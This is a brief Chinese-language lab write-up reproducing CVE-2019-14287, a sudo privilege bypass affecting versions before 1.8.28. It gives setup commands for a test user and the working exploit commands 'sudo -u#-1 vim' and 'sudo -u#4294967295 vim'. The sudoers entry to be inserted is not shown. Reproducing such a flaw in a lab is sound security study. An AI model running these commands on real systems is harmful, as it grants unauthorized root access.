CVE-2019-14287:sudo 权限绕过漏洞(复现 参考:Ms08067安全实验室 实验环境 kali win10 影响范围 sudo 1.8.28之前的所有版本 复现过程 首先,检查sudo的版本: 之后创建一个新用户: useradd test passwd test 在/etc/sudoers中插入 然后,切换用户为test su test 之后就可以通过vim来进行权限绕过。 输入sudo -u#-1 vim或sudo -u#4294967295 vim 进入vim